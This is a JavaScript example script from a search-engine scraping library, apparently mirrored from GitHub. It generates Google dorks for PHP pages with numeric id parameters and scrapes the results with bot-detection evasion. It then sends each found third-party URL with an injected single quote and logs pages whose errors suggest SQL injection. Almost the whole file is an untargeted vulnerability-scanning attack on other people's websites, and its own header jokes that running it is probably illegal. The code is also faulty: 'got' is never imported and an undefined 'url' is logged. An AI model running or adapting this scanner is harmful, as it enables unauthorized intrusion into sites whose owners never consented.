mirror of
https://github.com/NikolaiT/se-scraper.git
synced 2025-01-27 06:38:34 +01:00
103 lines
3.1 KiB
JavaScript
103 lines
3.1 KiB
JavaScript
|
|
/*
|
|
* Do not run this, this is probably illegal in your country ;)
|
|
*/
|
|
|
|
const se_scraper = require('./../index.js');
|
|
|
|
|
|
// generate some google dorks
|
|
|
|
function genGoogleDorks(iter=4) {
|
|
let lulz_keywords = [];
|
|
['seite', 'inicio', 'index'].forEach((x) => {
|
|
for (var i = 0; i < iter; i++) {
|
|
lulz_keywords.push(
|
|
'inurl:"' + x + '.php?id=' + Math.floor(Math.random() * 100) + '"'
|
|
)
|
|
}
|
|
});
|
|
return lulz_keywords;
|
|
}
|
|
|
|
const lulz_keywords = genGoogleDorks();
|
|
console.log(lulz_keywords);
|
|
|
|
|
|
// those options need to be provided on startup
|
|
// and cannot give to se-scraper on scrape() calls
|
|
let browser_config = {
|
|
// if random_user_agent is set to True, a random user agent is chosen
|
|
random_user_agent: true,
|
|
headless: true,
|
|
// whether debug information should be printed
|
|
// level 0: print nothing
|
|
// level 1: print most important info
|
|
// ...
|
|
// level 4: print all shit nobody wants to know
|
|
debug_level: 1,
|
|
is_local: false,
|
|
throw_on_detection: false,
|
|
puppeteer_cluster_config: {
|
|
headless: true,
|
|
timeout: 2 * 60 * 1000, // max timeout set to 2 minutes
|
|
monitor: false,
|
|
concurrency: 3, // one scraper per tab
|
|
maxConcurrency: 4, // scrape with 4 tabs
|
|
}
|
|
};
|
|
|
|
(async () => {
|
|
// scrape config can change on each scrape() call
|
|
let lulz_config = {
|
|
// which search engine to scrape
|
|
search_engine: 'google',
|
|
// an array of keywords to scrape
|
|
keywords: lulz_keywords,
|
|
// the number of pages to scrape for each keyword
|
|
num_pages: 3,
|
|
// how long to sleep between requests. a random sleep interval within the range [a,b]
|
|
// is drawn before every request. empty string for no sleeping.
|
|
sleep_range: '',
|
|
// path to output file, data will be stored in JSON
|
|
output_file: 'goodboys.json',
|
|
// whether to prevent images, css, fonts from being loaded
|
|
// will speed up scraping a great deal
|
|
block_assets: true,
|
|
// check if headless chrome escapes common detection techniques
|
|
// this is a quick test and should be used for debugging
|
|
test_evasion: false,
|
|
apply_evasion_techniques: true,
|
|
// log ip address data
|
|
log_ip_address: false,
|
|
// log http headers
|
|
log_http_headers: false,
|
|
};
|
|
|
|
let results = await se_scraper.scrape(browser_config, lulz_config);
|
|
|
|
const all_links = [];
|
|
|
|
for (var kw in results) {
|
|
for (var page in results[kw]) {
|
|
for (var res of results[kw][page]['results']) {
|
|
all_links.push(res.link);
|
|
}
|
|
}
|
|
}
|
|
|
|
console.log(all_links);
|
|
|
|
for (var link of all_links) {
|
|
try {
|
|
const response = await got(link.replace(/(id=\d+)/g, "$1'"));
|
|
let html = response.body;
|
|
if (html.includes('error') || html.includes('mysql')) {
|
|
console.log('Got a mysql injection in ' + url);
|
|
}
|
|
} catch (error) {
|
|
console.log(error.response.statusCode);
|
|
}
|
|
}
|
|
|
|
})(); |